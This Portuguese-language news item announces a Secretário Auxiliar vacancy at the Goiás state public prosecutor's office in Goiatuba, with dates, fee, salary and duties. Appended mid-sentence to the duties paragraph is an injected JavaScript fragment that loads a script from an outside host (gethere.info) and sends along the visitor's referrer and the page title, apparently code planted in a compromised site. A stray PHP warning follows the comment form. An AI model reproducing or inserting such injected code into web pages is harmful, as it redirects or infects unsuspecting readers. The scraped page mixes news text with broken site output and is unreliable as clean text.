GO: Ministério Público Estadual recebe inscrições para vaga de nível fundamental

Em Goiás, o Ministério Público Estadual publicou edital com uma vaga para o cargo de Secretário Auxiliar de nível fundamental. A vaga é para lotação na Promotoria de Justiça da Comarca de Goiatuba.

Os interessados devem se inscrever na página do Ministério Público de Goiás – www.mpgo.mp.br, do dia 10 de janeiro ao dia 08 de fevereiro. A taxa de participação custa R$ 62,02.

O processo de seleção terá prova objetiva e de redação/discursiva, que serão aplicadas na data provável de 12 de março de 2017. Os inscritos ainda passarão por avaliação de títulos.

O cargo oferece salário base de R$ 2.926,34, para jornada de trabalho de 40 horas semanais. Além do salário, os candidatos ainda recebem auxílio-alimentação, auxílio-transporte e auxílio-creche.

Entre as atribuições do cargo, estão: auxiliar no planejamento, execução e avaliação de planos, projetos, programas e pesquisas da administração superior do MP, auxiliar no atendimento ao público, organizar arquivos e redigir ou digitar documentos diversos, secretariar os promotores de justiça em suas atividades funcionais, entre outras atividades.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *


Warning: call_user_func_array() expects parameter 1 to be a valid callback, class 'livehelperchat' does not have a method 'wp_footer' in /home/clube/public_html/wp-includes/class-wp-hook.php on line 286